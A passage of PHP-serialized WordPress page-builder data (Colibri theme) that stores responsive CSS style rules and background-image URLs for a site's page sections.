20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:254;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:255;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-255 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:256;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-256-image {\n  max-height: 70px;\n}\n#colibri .style-256 a,#colibri .style-256  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-256-image,#colibri .h-navigation_sticky.style-256-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-256 a,#colibri .h-navigation_sticky .style-256  .logo-text,#colibri .h-navigation_sticky.style-256 a,#colibri .h-navigation_sticky.style-256  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:257;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:258;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-258 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:259;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-259 ol {\n  list-style-type: decimal;\n}\n#colibri .style-259 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:260;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:261;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:262;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:263;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:264;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:265;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:266;a:3:{s:7:\"desktop\";s:79:\"#colibri .style-266 {\n  background-color: #f6f8fa;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:267;a:3:{s:7:\"desktop\";s:90:\"#colibri .style-267 {\n  min-height: 115px;\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:268;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:269;a:3:{s:7:\"desktop\";s:158:\".style-269 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-269 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:270;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:271;a:3:{s:7:\"desktop\";s:228:\"#colibri .style-271 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  background-color: rgba(255, 255, 255, 0.43);\n  background-image: none;\n}\n#colibri .style-271  > .h-section-grid-container {\n  margin-top: -75px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:43:\"#colibri .style-271 {\n  margin-top: 0px;\n}\n\";}i:272;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:273;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-273 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:274;a:3:{s:7:\"desktop\";s:702:\"#colibri .style-274-icon {\n  fill: #f6f8fa;\n  width: 80px ;\n  height: 80px;\n  background-color: #303e7a;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n  padding-top: 20px;\n  padding-right: 20px;\n  padding-bottom: 20px;\n  padding-left: 20px;\n  box-shadow: 0px 10px 30px 2px rgba(49, 52, 57, 0.3) ;\n  margin-bottom: 10px;\n}\n#colibri .style-274 {\n  box-shadow: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:275;a:3:{s:7:\"desktop\";s:370:\"#colibri .style-275 p,#colibri .style-275  h1,#colibri .style-275  h2,#colibri .style-275  h3,#colibri .style-275  h4,#colibri .style-275  h5,#colibri .style-275  h6 {\n  text-transform: uppercase;\n  letter-spacing: 1px;\n}\n#colibri .style-275 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:276;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-276 ol {\n  list-style-type: decimal;\n}\n#colibri .style-276 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:277;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:278;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:279;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:280;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:285;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-285 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:286;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-286 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:287;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-287 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-287 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-287 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-left: 0%;\n}\n\";}i:288;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-288 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:289;a:3:{s:7:\"desktop\";s:338:\"#colibri .style-289 p,#colibri .style-289  h1,#colibri .style-289  h2,#colibri .style-289  h3,#colibri .style-289  h4,#colibri .style-289  h5,#colibri .style-289  h6 {\n  text-align: left;\n}\n#colibri .style-289 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:190:\"#colibri .style-289 p,#colibri .style-289  h1,#colibri .style-289  h2,#colibri .style-289  h3,#colibri .style-289  h4,#colibri .style-289  h5,#colibri .style-289  h6 {\n  font-size: 2.5em;\n}\n\";s:6:\"mobile\";s:190:\"#colibri .style-289 p,#colibri .style-289  h1,#colibri .style-289  h2,#colibri .style-289  h3,#colibri .style-289  h4,#colibri .style-289  h5,#colibri .style-289  h6 {\n  font-size: 2.5em;\n}\n\";}i:290;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-290 ol {\n  list-style-type: decimal;\n}\n#colibri .style-290 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:291;a:3:{s:7:\"desktop\";s:891:\"#colibri .style-291 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-291 {\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-291 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(-5%);\n}\n\";}i:292;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-292 {\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:293;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-293 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:294;a:3:{s:7:\"desktop\";s:867:\"#colibri .style-294 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  z-index: 1;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-294 {\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-294 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(5%);\n}\n\";}i:295;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-295 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-295 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-295 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n}\n\";}i:296;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-296 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:298;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-298 ol {\n  list-style-type: decimal;\n}\n#colibri .style-298 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:314;a:3:{s:7:\"desktop\";s:159:\"#colibri .style-314 {\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:317;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:318;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-318 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:319;a:3:{s:7:\"desktop\";s:279:\"#colibri .style-319 {\n  font-family: Baloo;\n  font-weight: 400;\n  font-size: 20px;\n}\n#colibri .style-319 p {\n  font-family: Baloo;\n  font-weight: 400;\n  font-size: 20px;\n}\n#colibri .style-319 ol {\n  list-style-type: decimal;\n}\n#colibri .style-319 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:321;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:322;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-322 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:324;a:3:{s:7:\"desktop\";s:338:\"#colibri .style-324 p,#colibri .style-324  h1,#colibri .style-324  h2,#colibri .style-324  h3,#colibri .style-324  h4,#colibri .style-324  h5,#colibri .style-324  h6 {\n  font-weight: 600;\n}\n#colibri .style-324 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:329;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-329 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:330;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-330 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:331;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:333;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-333 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:334;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-334 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:335;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:336;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-336 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:337;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-337 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:338;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:339;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-339 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:340;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-340 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:341;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-341 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-341 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-341 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-left: 0%;\n}\n\";}i:342;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-342 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:344;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-344 ol {\n  list-style-type: decimal;\n}\n#colibri .style-344 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:345;a:3:{s:7:\"desktop\";s:844:\"#colibri .style-345 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-345 {\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-345 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(-5%);\n}\n\";}i:346;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-346 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:347;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-347 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:348;a:3:{s:7:\"desktop\";s:897:\"#colibri .style-348 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-position: center center;\n  background-size: contain;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  z-index: 1;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-348 {\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-348 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(5%);\n}\n\";}i:349;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-349 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-349 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-349 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n}\n\";}i:350;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-350 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:352;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-352 ol {\n  list-style-type: decimal;\n}\n#colibri .style-352 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:353;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-353 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:354;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-354 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:355;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-355 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-355 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-355 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-left: 0%;\n}\n\";}i:356;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-356 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:358;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-358 ol {\n  list-style-type: decimal;\n}\n#colibri .style-358 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:359;a:3:{s:7:\"desktop\";s:899:\"#colibri .style-359 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-359 {\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-359 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(-5%);\n}\n\";}i:360;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-360 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:361;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-361 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:362;a:3:{s:7:\"desktop\";s:887:\"#colibri .style-362 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  z-index: 1;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 